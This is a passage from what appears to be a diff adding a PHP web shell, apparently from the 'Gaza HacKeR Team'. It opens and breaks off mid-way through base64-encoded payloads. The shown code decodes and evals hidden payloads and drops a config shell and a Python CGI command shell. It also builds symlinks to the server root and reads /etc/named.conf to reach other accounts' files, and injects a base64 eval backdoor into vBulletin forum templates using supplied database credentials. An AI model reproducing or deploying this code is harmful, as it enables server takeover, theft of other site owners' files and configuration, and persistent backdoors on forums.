PdzBLYjNCbGJpQW9UVmxHU1V4RkxDQWlQblJoY2k1MGJYQWlLVHNOQ25CeWFXNTBJRTFaUmtsTVJTQWlkR0Z5SUMxamVtWWdJaTRrUms5U1RYdDBZWEo5TGlJdWRHRnlJQ0k3RFFwbWIzSWdLQ1JyWVQwd095UnJZVHdrZVRza2EyRXJLeWw3RFFwM2FHbHNaU2hBYkdsdVpYTmJKR3RoWFNBZ1BYNGdiUzhvTGlvL0tUcDRPaTluS1hzTkNpWnNhV3dvSkRFcE93MEtjSEpwYm5RZ1RWbEdTVXhGSUNReExpSXVkSGgwSUNJN0RRcG1iM0lvSkd0a1BURTdKR3RrUERFNE95UnJaQ3NyS1hzTkNuQnlhVzUwSUUxWlJrbE1SU0FrTVM0a2EyUXVJaTUwZUhRZ0lqc05DbjBOQ24wTkNpQjlEUXB3Y21sdWRDYzhZbTlrZVNCamJHRnpjejBpYm1WM1UzUjViR1V4SWlCaVoyTnZiRzl5UFNJak1EQXdNREF3SWo0TkNqeHdQa1J2Ym1VZ0lTRThMM0ErRFFvOGNENG1ibUp6Y0RzOEwzQStKenNOQ21sbUtDUkdUMUpOZTNSaGNuMGdibVVnSWlJcGV3MEtiM0JsYmloSlRrWlBMQ0FpZEdGeUxuUnRjQ0lwT3cwS1FHeHBibVZ6SUQwOFNVNUdUejRnT3cwS1kyeHZjMlVvU1U1R1R5azdEUXB6ZVhOMFpXMG9RR3hwYm1WektUc05DbkJ5YVc1MEp6eHdQanhoSUdoeVpXWTlJaWN1SkVaUFVrMTdkR0Z5ZlM0bkxuUmhjaUkrUEdadmJuUWdZMjlzYjNJOUlpTXdNRVpHTURBaVBnMEtQSE53WVc0Z2MzUjViR1U5SW5SbGVIUXRaR1ZqYjNKaGRHbHZiam9nYm05dVpTSStRMnhwWTJzZ1NHVnlaU0JVYnlCRWIzZHViRzloWkNCVVlYSWdSbWxzWlR3dmMzQmhiajQ4TDJadmJuUStQQzloUGp3dmNENG5PdzBLZlEwS2ZRMEtJSEJ5YVc1MElnMEtQQzlpYjJSNVBnMEtQQzlvZEcxc1BpSTcnOwoKJGZpbGUgPSBmb3BlbigiY29uZmlnLml6byIgLCJ3KyIpOwokd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRjb25maWdzaGVsbCkpOwpmY2xvc2UoJGZpbGUpOwogICAgY2htb2QoImNvbmZpZy5pem8iLDA3NTUpOwogICBlY2hvICI8L2JyPjxhIGhyZWY9J2J5cGFzcy9jb25maWdsZXIvY29uZmlnLml6bycgdGFyZ2V0PSdfYmxhbmsnPiBHbyBUbyBbQ29uZmlnX1NoZWxsXSA+PjwvYT4iOwogIGJyZWFrOwpjYXNlICJQeXRob25fU2hlbGwiOgoKICAgIEBta2RpcignYnlwYXNzL3B5dGhvbicsIDA3NTUpOwogICAgY2hkaXIoJ2J5cGFzcy9weXRob24nKTsKICAgICAgICAkdGtsID0gIi5odGFjY2VzcyI7CiAgICAgICAgJHRrbF9ub3RlID0gIiR0a2wiOwogICAgICAgICRkb2R5ID0gZm9wZW4gKCR0a2xfbm90ZSAsICd3Jykgb3IgZGllICgiZG9keSBhJiMyMzE7JiMzMDU7bGFtYWQmIzMwNTshIik7CiAgICAgICAgJG1ldGluID0gIkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuaXpvIjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCAkbWV0aW4gKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRweXRob25wID0gJ0l5RXZkWE55TDJKcGJpOXdlWFJvYjI0S0l5QXdOeTB3Tnkwd05Bb2pJSFl4TGpBdU1Bb0tJeUJqWjJrdGMyaGxiR3d1Y0hrS0l5QkIKSUhOcGJYQnNaU0JEUjBrZ2RHaGhkQ0JsZUdWamRYUmxjeUJoY21KcGRISmhjbmtnYzJobGJHd2dZMjl0YldGdVpITXVDZ29LSXlCRApiM0I1Y21sbmFIUWdUV2xqYUdGbGJDQkdiMjl5WkFvaklGbHZkU0JoY21VZ1puSmxaU0IwYnlCdGIyUnBabmtzSUhWelpTQmhibVFnCmNtVnNhV05sYm5ObElIUm9hWE1nWTI5a1pTNEtDaU1nVG04Z2QyRnljbUZ1ZEhrZ1pYaHdjbVZ6Y3lCdmNpQnBiWEJzYVdWa0lHWnYKY2lCMGFHVWdZV05qZFhKaFkza3NJR1pwZEc1bGMzTWdkRzhnY0hWeWNHOXpaU0J2Y2lCdmRHaGxjbmRwYzJVZ1ptOXlJSFJvYVhNZwpZMjlrWlM0dUxpNEtJeUJWYzJVZ1lYUWdlVzkxY2lCdmQyNGdjbWx6YXlBaElTRUtDaU1nUlMxdFlXbHNJRzFwWTJoaFpXd2dRVlFnClptOXZjbVFnUkU5VUlHMWxJRVJQVkNCMWF3b2pJRTFoYVc1MFlXbHVaV1FnWVhRZ2QzZDNMblp2YVdSemNHRmpaUzV2Y21jdWRXc3YKWVhSc1lXNTBhV0p2ZEhNdmNIbDBhRzl1ZFhScGJITXVhSFJ0YkFvS0lpSWlDa0VnYzJsdGNHeGxJRU5IU1NCelkzSnBjSFFnZEc4ZwpaWGhsWTNWMFpTQnphR1ZzYkNCamIyMXRZVzVrY3lCMmFXRWdRMGRKTGdvaUlpSUtJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qCkl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXdvaklFbHRjRzl5ZEhNS2RISjUKT2dvZ0lDQWdhVzF3YjNKMElHTm5hWFJpT3lCaloybDBZaTVsYm1GaWJHVW9LUXBsZUdObGNIUTZDaUFnSUNCd1lYTnpDbWx0Y0c5eQpkQ0J6ZVhNc0lHTm5hU3dnYjNNS2MzbHpMbk4wWkdWeWNpQTlJSE41Y3k1emRHUnZkWFFLWm5KdmJTQjBhVzFsSUdsdGNHOXlkQ0J6CmRISm1kR2x0WlFwcGJYQnZjblFnZEhKaFkyVmlZV05yQ21aeWIyMGdVM1J5YVc1blNVOGdhVzF3YjNKMElGTjBjbWx1WjBsUENtWnkKYjIwZ2RISmhZMlZpWVdOcklHbHRjRzl5ZENCd2NtbHVkRjlsZUdNS0NpTWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNagpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1LSXlCamIyNXpkR0Z1ZEhNS0NtWnZiblJzCmFXNWxJRDBnSnp4R1QwNVVJRU5QVEU5U1BTTTBNalF5TkRJZ2MzUjViR1U5SW1admJuUXRabUZ0YVd4NU9uUnBiV1Z6TzJadmJuUXQKYzJsNlpUb3hNbkIwT3lJK0p3cDJaWEp6YVc5dWMzUnlhVzVuSUQwZ0oxWmxjbk5wYjI0Z01TNHdMakFnTjNSb0lFcDFiSGtnTWpBdwpOQ2NLQ21sbUlHOXpMbVZ1ZG1seWIyNHVhR0Z6WDJ0bGVTZ2lVME5TU1ZCVVgwNUJUVVVpS1RvS0lDQWdJSE5qY21sd2RHNWhiV1VnClBTQnZjeTVsYm5acGNtOXVXeUpUUTFKSlVGUmZUa0ZOUlNKZENtVnNjMlU2Q2lBZ0lDQnpZM0pwY0hSdVlXMWxJRDBnSWlJS0NrMUYKVkVoUFJDQTlJQ2NpVUU5VFZDSW5DZ29qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNagpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakNpTWdVSEpwZG1GMFpTQm1kVzVqZEdsdmJuTWdZVzVrSUhaaGNtbGhZbXhsCmN3b0taR1ZtSUdkbGRHWnZjbTBvZG1Gc2RXVnNhWE4wTENCMGFHVm1iM0p0TENCdWIzUndjbVZ6Wlc1MFBTY25LVG9LSUNBZ0lDSWkKSWxSb2FYTWdablZ1WTNScGIyNHNJR2RwZG1WdUlHRWdRMGRKSUdadmNtMHNJR1Y0ZEhKaFkzUnpJSFJvWlNCa1lYUmhJR1p5YjIwZwphWFFzSUdKaGMyVmtJRzl1Q2lBZ0lDQjJZV3gxWld4cGMzUWdjR0Z6YzJWa0lHbHVMaUJCYm5rZ2JtOXVMWEJ5WlhObGJuUWdkbUZzCmRXVnpJR0Z5WlNCelpYUWdkRzhnSnljZ0xTQmhiSFJvYjNWbmFDQjBhR2x6SUdOaGJpQmlaU0JqYUdGdVoyVmtMZ29nSUNBZ0tHVXUKWnk0Z2RHOGdjbVYwZFhKdUlFNXZibVVnYzI4Z2VXOTFJR05oYmlCMFpYTjBJR1p2Y2lCdGFYTnphVzVuSUd0bGVYZHZjbVJ6SUMwZwpkMmhsY21VZ0p5Y2dhWE1nWVNCMllXeHBaQ0JoYm5OM1pYSWdZblYwSUhSdklHaGhkbVVnZEdobElHWnBaV3hrSUcxcGMzTnBibWNnCmFYTnVKM1F1S1NJaUlnb2dJQ0FnWkdGMFlTQTlJSHQ5Q2lBZ0lDQm1iM0lnWm1sbGJHUWdhVzRnZG1Gc2RXVnNhWE4wT2dvZ0lDQWcKSUNBZ0lHbG1JRzV2ZENCMGFHVm1iM0p0TG1oaGMxOXJaWGtvWm1sbGJHUXBPZ29nSUNBZ0lDQWdJQ0FnSUNCa1lYUmhXMlpwWld4awpYU0E5SUc1dmRIQnlaWE5sYm5RS0lDQWdJQ0FnSUNCbGJITmxPZ29nSUNBZ0lDQWdJQ0FnSUNCcFppQWdkSGx3WlNoMGFHVm1iM0p0ClcyWnBaV3hrWFNrZ0lUMGdkSGx3WlNoYlhTazZDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmtZWFJoVzJacFpXeGtYU0E5SUhSb1pXWnYKY20xYlptbGxiR1JkTG5aaGJIVmxDaUFnSUNBZ0lDQWdJQ0FnSUdWc2MyVTZDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjJZV3gxWlhNZwpQU0J0WVhBb2JHRnRZbVJoSUhnNklIZ3VkbUZzZFdVc0lIUm9aV1p2Y20xYlptbGxiR1JkS1NBZ0lDQWdJeUJoYkd4dmQzTWdabTl5CklHeHBjM1FnZEhsd1pTQjJZV3gxWlhNS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdSaGRHRmJabWxsYkdSZElEMGdkbUZzZFdWekNpQWcKSUNCeVpYUjFjbTRnWkdGMFlRb0tDblJvWldadmNtMW9aV0ZrSUQwZ0lpSWlQRWhVVFV3K1BFaEZRVVErUEZSSlZFeEZQbU5uYVMxegphR1ZzYkM1d2VTQXRJR0VnUTBkSklHSjVJRVoxZW5wNWJXRnVQQzlVU1ZSTVJUNDhMMGhGUVVRK0NqeENUMFJaUGp4RFJVNVVSVkkrCkNqeElNVDVYWld4amIyMWxJSFJ2SUdObmFTMXphR1ZzYkM1d2VTQXRJRHhDVWo1aElGQjVkR2h2YmlCRFIwazhMMGd4UGdvOFFqNDgKU1Q1Q2VTQkdkWHA2ZVcxaGJqd3ZRajQ4TDBrK1BFSlNQZ29pSWlJclptOXVkR3hwYm1VZ0t5SldaWEp6YVc5dUlEb2dJaUFySUhabApjbk5wYjI1emRISnBibWNnS3lBaUlpSXNJRkoxYm01cGJtY2diMjRnT2lBaUlpSWdLeUJ6ZEhKbWRHbHRaU2duSlVrNkpVMGdKWEFzCklDVkJJQ1ZrSUNWQ0xDQWxXU2NwS3ljdVBDOURSVTVVUlZJK1BFSlNQaWNLQ25Sb1pXWnZjbTBnUFNBaUlpSThTREkrUlc1MFpYSWcKUTI5dGJXRnVaRHd2U0RJK0NqeEdUMUpOSUUxRlZFaFBSRDFjSWlJaUlpQXJJRTFGVkVoUFJDQXJJQ2NpSUdGamRHbHZiajBpSnlBcgpJSE5qY21sd2RHNWhiV1VnS3lBaUlpSmNJajRLUEdsdWNIVjBJRzVoYldVOVkyMWtJSFI1Y0dVOWRHVjRkRDQ4UWxJK0NqeHBibkIxCmRDQjBlWEJsUFhOMVltMXBkQ0IyWVd4MVpUMGlVM1ZpYldsMElqNDhRbEkrQ2p3dlJrOVNUVDQ4UWxJK1BFSlNQaUlpSWdwaWIyUjUKWlc1a0lEMGdKend2UWs5RVdUNDhMMGhVVFV3K0p3cGxjbkp2Y20xbGMzTWdQU0FuUEVORlRsUkZVajQ4U0RJK1UyOXRaWFJvYVc1bgpJRmRsYm5RZ1YzSnZibWM4TDBneVBqeENVajQ4VUZKRlBpY0tDaU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qCkl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNS0l5QnRZV2x1SUdKdlpIa2diMllnZEdobElITmoKY21sd2RBb0thV1lnWDE5dVlXMWxYMThnUFQwZ0oxOWZiV0ZwYmw5Zkp6b0tJQ0FnSUhCeWFXNTBJQ0pEYjI1MFpXNTBMWFI1Y0dVNgpJSFJsZUhRdmFIUnRiQ0lnSUNBZ0lDQWdJQ0FqSUhSb2FYTWdhWE1nZEdobElHaGxZV1JsY2lCMGJ5QjBhR1VnYzJWeWRtVnlDaUFnCklDQndjbWx1ZENBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSXlCemJ5QnBjeUIwYUdseklHSnMKWVc1cklHeHBibVVLSUNBZ0lHWnZjbTBnUFNCaloya3VSbWxsYkdSVGRHOXlZV2RsS0NrS0lDQWdJR1JoZEdFZ1BTQm5aWFJtYjNKdApLRnNuWTIxa0oxMHNabTl5YlNrS0lDQWdJSFJvWldOdFpDQTlJR1JoZEdGYkoyTnRaQ2RkQ2lBZ0lDQndjbWx1ZENCMGFHVm1iM0p0CmFHVmhaQW9nSUNBZ2NISnBiblFnZEdobFptOXliUW9nSUNBZ2FXWWdkR2hsWTIxa09nb2dJQ0FnSUNBZ0lIQnlhVzUwSUNjOFNGSSsKUEVKU1BqeENVajRuQ2lBZ0lDQWdJQ0FnY0hKcGJuUWdKenhDUGtOdmJXMWhibVFnT2lBbkxDQjBhR1ZqYldRc0lDYzhRbEkrUEVKUwpQaWNLSUNBZ0lDQWdJQ0J3Y21sdWRDQW5VbVZ6ZFd4MElEb2dQRUpTUGp4Q1VqNG5DaUFnSUNBZ0lDQWdkSEo1T2dvZ0lDQWdJQ0FnCklDQWdJQ0JqYUdsc1pGOXpkR1JwYml3Z1kyaHBiR1JmYzNSa2IzVjBJRDBnYjNNdWNHOXdaVzR5S0hSb1pXTnRaQ2tLSUNBZ0lDQWcKSUNBZ0lDQWdZMmhwYkdSZmMzUmthVzR1WTJ4dmMyVW9LUW9nSUNBZ0lDQWdJQ0FnSUNCeVpYTjFiSFFnUFNCamFHbHNaRjl6ZEdSdgpkWFF1Y21WaFpDZ3BDaUFnSUNBZ0lDQWdJQ0FnSUdOb2FXeGtYM04wWkc5MWRDNWpiRzl6WlNncENpQWdJQ0FnSUNBZ0lDQWdJSEJ5CmFXNTBJSEpsYzNWc2RDNXlaWEJzWVdObEtDZGNiaWNzSUNjOFFsSStKeWtLQ2lBZ0lDQWdJQ0FnWlhoalpYQjBJRVY0WTJWd2RHbHYKYml3Z1pUb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSXlCaGJpQmxjbkp2Y2lCcGJpQmxlR1ZqZFhScGJtY2dkR2hsSUdOdgpiVzFoYm1RS0lDQWdJQ0FnSUNBZ0lDQWdjSEpwYm5RZ1pYSnliM0p0WlhOekNpQWdJQ0FnSUNBZ0lDQWdJR1lnUFNCVGRISnBibWRKClR5Z3BDaUFnSUNBZ0lDQWdJQ0FnSUhCeWFXNTBYMlY0WXlobWFXeGxQV1lwQ2lBZ0lDQWdJQ0FnSUNBZ0lHRWdQU0JtTG1kbGRIWmgKYkhWbEtDa3VjM0JzYVhSc2FXNWxjeWdwQ2lBZ0lDQWdJQ0FnSUNBZ0lHWnZjaUJzYVc1bElHbHVJR0U2Q2lBZ0lDQWdJQ0FnSUNBZwpJQ0FnSUNCd2NtbHVkQ0JzYVc1bENnb2dJQ0FnY0hKcGJuUWdZbTlrZVdWdVpBb0tDaUlpSWdwVVQwUlBMMGxUVTFWRlV3b0tDZ3BEClNFRk9SMFZNVDBjS0NqQTNMVEEzTFRBMElDQWdJQ0FnSUNCV1pYSnphVzl1SURFdU1DNHdDa0VnZG1WeWVTQmlZWE5wWXlCemVYTjAKWlcwZ1ptOXlJR1Y0WldOMWRHbHVaeUJ6YUdWc2JDQmpiMjF0WVc1a2N5NEtTU0J0WVhrZ1pYaHdZVzVrSUdsMElHbHVkRzhnWVNCdwpjbTl3WlhJZ0oyVnVkbWx5YjI1dFpXNTBKeUIzYVhSb0lITmxjM05wYjI0Z2NHVnljMmx6ZEdWdVkyVXVMaTRLSWlJaSc7CgokZmlsZSA9IGZvcGVuKCJweXRob24uaXpvIiAsIncrIik7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJHB5dGhvbnApKTsKZmNsb3NlKCRmaWxlKTsKICAgIGNobW9kKCJweXRob24uaXpvIiwwNzU1KTsKICBlY2hvICI8L2JyPjxhIGhyZWY9J2J5cGFzcy9weXRob24vcHl0aG9uLml6bycgdGFyZ2V0PSdfYmxhbmsnPiBHbyBUbyBbUHl0aG9uIFNoZWxsXSA+PjwvYT4iOwpicmVhazsKCgp9CmV4aXQ7";
+eval(base64_decode($tkl));
+exit;
+case "symlink":
+$tkl = "ICBAc2V0X3RpbWVfbGltaXQoMCk7IEBta2RpcigndGtsJywwNzc3KTsgJElJSUlJSUlJSUlsMSAgPSAiT3B0aW9ucyBhbGwgXG4gRGlyZWN0b3J5SW5kZXggZ2F6YS5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsgJElJSUlJSUlJSUkxSSA9QGZvcGVuICgndGtsLy5odGFjY2VzcycsJ3cnKTsgZndyaXRlKCRJSUlJSUlJSUlJMUkgLCRJSUlJSUlJSUlJbDEpOyAgZWNobyAnICA8YnIgLz48YnIgLz4gPGZvcm0gbWV0aG9kPSJwb3N0Ij4gRmlsZSBQYXRoOjxiciAvPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9ob21lL2dhemFoYWNrL3B1YmxpY19odG1sL2NvbmZpZy5waHAiIHNpemU9IjYwIi8+IDxicj5TeW1saW5rIE5hbWU8YnI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJzeW1maWxlIiB2YWx1ZT0iZ2F6YS50eHQiIHNpemU9IjYwIi8+PGJyIC8+PGJyIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzeW1saW5rIiBuYW1lPSJzeW1saW5rIiAvPiA8YnIgLz48YnIgLz4gPC9mb3JtPiAnOyAkSUlJSUlJSUkxbElsID0gJF9QT1NUWydmaWxlJ107ICRzeW1maWxlID0gJF9QT1NUWydzeW1maWxlJ107ICRzeW1saW5rID0gJF9QT1NUWydzeW1saW5rJ107IGlmICgkc3ltbGluaykgeyBAc3ltbGluaygiJElJSUlJSUlJMWxJbCIsInRrbC8kc3ltZmlsZSIpOyBlY2hvICc8YnIgLz48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0idGtsLycuJHN5bWZpbGUuJyIgPj09PT4nLiRzeW1maWxlLic8PT09PC9hPic7IH0gIEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgICRJSUlJSUlJSUlsbEkgPSBAZmlsZSgnL2V0Yy9uYW1lZC5jb25mJyk7IGlmKCEkSUlJSUlJSUlJbGxJKSB7IGRpZSAoIiBjYW4ndCByZWFkIC9ldGMvbmFtZWQuY29uZiIpOyB9IGVsc2UgeyAgICAgZWNobyAiPGRpdiBjbGFzcz0ndG1wJz48dGFibGUgIHdpZHRoPSc0MCUnPjx0ZD5Eb21haW5zPC90ZD48dGQ+VXNlcnMgJiBzeW1saW5rPC90ZD4iOyBmb3JlYWNoKCRJSUlJSUlJSUlsbEkgYXMgJElJSUlJSUlJSWxsMSl7IGlmKGVyZWdpKCd6b25lJywkSUlJSUlJSUlJbGwxKSl7IHByZWdfbWF0Y2hfYWxsKCcjem9uZSAiKC4qKSIjJywkSUlJSUlJSUlJbGwxLCRJSUlJSUlJSUlsMTEpOyBmbHVzaCgpOyBpZihzdHJsZW4odHJpbSgkSUlJSUlJSUlJbDExWzFdWzBdKSkgPjIpeyAkSUlJSUlJSUlJMUkxID0gcG9zaXhfZ2V0cHd1aWQoQGZpbGVvd25lcignL2V0Yy92YWxpYXNlcy8nLiRJSUlJSUlJSUlsMTFbMV1bMF0pKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUkxSTFbJ25hbWUnXSA7IEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUlsMTFbMV1bMF07IGVjaG8gIiA8dHI+IDx0ZD4gPGRpdiBjbGFzcz0nZG9tJz48YSB0YXJnZXQ9J19ibGFuaycgaHJlZj1odHRwOi8vd3d3LiIuJElJSUlJSUlJSWwxMVsxXVswXS4iLz4iLiRJSUlJSUlJSTFJMWwuIiA8L2E+IDwvZGl2PiA8L3RkPiA8dGQ+IDxhIGhyZWY9J3RrbC9yb290L2hvbWUvIi4kSUlJSUlJSUlJMUkxWyduYW1lJ10uIi9wdWJsaWNfaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPiIuJElJSUlJSUlJSTFJMVsnbmFtZSddLiI8L2E+ICA8L3RkPiA8L3RyPjwvZGl2PiAiOyBmbHVzaCgpOyB9IH0gfSB9";
+eval(base64_decode($tkl));
+exit;
+case "vBulletin-Tool":
+echo '<form method="GET">Select Tool : <br><p>
+			<select name="tool">
+				<option value="Inject">Shell Inject</option>
+				<option value="VBindex">Change index</option>
+								</select>
+			<input type="submit" value=">>" />
+		
+			</p>
+		</form>';
+exit;
+case "Inject":
+echo '
+Shell Inject</b></p>';
+if (empty($_POST[db])){
+print '
+<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
+<br>
+Inject To :<br><select size="1" name="template">
+<option value="FAQ">FAQ.PHP</option>
+<option value="FORUMHOME">FORUMHOME</option>
+<option value="search_forums">search forums</option>
+<option value="SHOWGROUPS">SHOWGROUPS</option>
+<option value="SHOWTHREAD">SHOWTHREAD.PHP</option>
+<option value="CALENDAR">CALENDAR.PHP</option>
+<option value="MEMBERINFO">MEMBERINFO</option>
+<option value="footer">footer</option>
+<option value="header">header</option>
+<option value="headinclude">headinclude</option>
+<option value="lostpw">lostpw</option>
+<option value="memberlist">memberlist</option></select></p>
+<br> Host : <br><input name="lo" type="text" value="localhost" align="LEFT" size="18"> 
+<br>DataBase Name: <br><input name="db" type="text"  align="LEFT" size="18" >
+<br>User Name :<br><input name="user" type="text"  align="LEFT" size="15" >
+<br>Password :<br><input name="pass" type="text"  align="MIDDLE" size="15" >
+<br>Table Prefix :<br><input name="tab" type="text"  align="LEFT" size="15" >
+<br><input type="submit" value="Inject"/>';
+}else{
+$a ="{\${eval(base64_decode(\'";
+$code ='JGNvZGUgPSAnUEQ4Z0lHbG1JQ2drWkdseUlEMDlJQ2NuS1hzZ0pHUnBjaUE5SUdkbGRHTjNaQ2dwT3lCOUlHbG1JQ2drWDFCUFUxUmJKMk52YlcxaGJtUW5YU0FoUFNBbkp5bDdJQ1JsZUdWalgzUjVjR1U5SkY5UVQxTlVXeWRsZUdWamRYUmxYM1I1Y0dVblhUc2dKR052YlQwa1gxQlBVMVJiSjJOdmJXMWhibVFuWFRzZ1pXTm9ieUFrWTI5dE95QnBaaUFvYVhOelpYUW9KR1Y0WldOZmRIbHdaU2twSUhzZ2FXWWdLQ1JsZUdWalgzUjVjR1U5UFNJeElpa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUtDUmxlR1ZqWDNSNWNHVTlQU0l5SWlrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU15SXBJSHNnY0dGemMzUm9jblVvSkdOdmJTazdJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU5DSXBJSHNnYVdZZ0tHWjFibU4wYVc5dVgyVjRhWE4wY3loemFHVnNiRjlsZUdWaktTa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb2MzbHpkR1Z0S1NrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dmU0JsYkhObGFXWWdLR1oxYm1OMGFXOXVYMlY0YVhOMGN5aHdZWE56ZEdoeWRTa3BJSHNnWldOb2J5QndZWE56ZEdoeWRTZ2tZMjl0S1RzZ2ZTQmxiSE5sSUhzZ1pXTm9ieUFpV3kxZFNTQmpZVzRnYm05MElFVjRaV04xZEdVZ1lXNTVJR052YlcxaGJtUWlPeUI5SUNBZ0lDQjlJSDBnSUgwZ2FXWWdLQ0ZsYlhCMGVTQW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMHBLU0I3SUNBZ0lDQnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMWJKM1J0Y0Y5dVlXMWxKMTBzSkdScGNpNG5MeWN1SkY5R1NVeEZVMXNuWjJGNllWVlFKMTFiSjI1aGJXVW5YU2s3SUNBZ0lDQWtaMkY2WVY5MFpYaDBJRDBnSWp4aVBsVndiRzloWkdWa0lGTjFZMk5sYzNObWRXeHNlVHd2WWo0OFluSStabWxzWlNCdVlXMWxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmJtRnRaU2RkTGlJOFluSStabWxzWlNCemFYcGxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmMybDZaU2RkTGlJOFluSStabWxzWlNCMGVYQmxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmRIbHdaU2RkTGlJOFluSStJanNnZlNCbFkyaHZKendoTFMwZ1JYaGxZM1YwWlNBdUwzUnJiQzB0UGlBSkNUeG1iM0p0SUcxbGRHaHZaRDFRVDFOVUlENEpDUWs4Y0Q0Z0NRa0pQR2x1Y0hWMElIUjVjR1U5SW5SbGVIUWlJRzVoYldVOUltTnZiVzFoYm1RaUlDOCtJQWtKQ1R4elpXeGxZM1FnYm1GdFpUMGlaWGhsWTNWMFpWOTBlWEJsSWo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU5ENUJkWFJ2SUZObGJHVmpkRHd2YjNCMGFXOXVQaUFKQ1FrSlBHOXdkR2x2YmlCMllXeDFaVDB4UG5Ob1pXeHNJR1Y0WldNOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU1qNXplWE4wWlcwOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU16NXdZWE56ZEdoeWRUd3ZiM0IwYVc5dVBpQUpDUWtKQ1FrSkNUd3ZjMlZzWldOMFBpQUpDUWs4YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpUlhobFkzVjBaU0lnTHo0Z0NTQUpDUWs4TDNBK0lBa0pQQzltYjNKdFBpQThJUzB0SUdWdVpDQkZlR1ZqZFhSbElDNHZkR3RzTFMwK0p6c2daV05vYnlBaVBDRXRMWFZ3Ykc5aFpDQm1hV3hsSUM0dmRHdHNMUzArSUR4c1pXWjBQaUE4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBpQThhVzV3ZFhRZ2RIbHdaVDBuWm1sc1pTY2dibUZ0WlQwbloyRjZZVlZRSnlCemFYcGxQU2N5TXljZ1BpQThhVzV3ZFhRZ2RIbHdaVDBuYzNWaWJXbDBKeUIyWVd4MVpUMG5WWEJzYjJGa0p5QnphWHBsUFNjek5TY2dQaUE4TDJadmNtMCtJRHd2YkdWbWRENGdQQ0V0TFNCbGJtUWdkWEJzYjJGa0lHWnBiR1VnTGk5MGEyd3RMVDRpT3lCbFkyaHZJQ1JuWVhwaFgzUmxlSFE3SUdWamFHOGdKenhqWlc1MFpYSStQR0VnYUhKbFpqMGlhSFIwY0RvdkwyZGhlbUV0YUdGamEyVnlMbTVsZENJZ2RHRnlaMlYwUFNKZllteGhibXNpUGx0SFlYcGhJRWhoUTB0bFVpQlVaV0Z0WFR3dllUNGdMU0E4WVNCb2NtVm1QU0pvZEhSd09pOHZaMkY2WVMxb1lXTnJaWEl1Ym1WMEwyTmpMMjFsYldKbGNpMTFYekl5TXpZeExtaDBiV3dpSUhSaGNtZGxkRDBpWDJKc1lXNXJJajViVkV0TVhUd3ZZVDQ4TDJObGJuUmxjajRuT3lBZ1B6ND0nOyAkZnAgPSBmb3BlbigiZ2F6YTMtdmIucGhwIiwidysiKTsgZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCRjb2RlKSk7IGhlYWRlcigiTG9jYXRpb246IGdhemEzLXZiL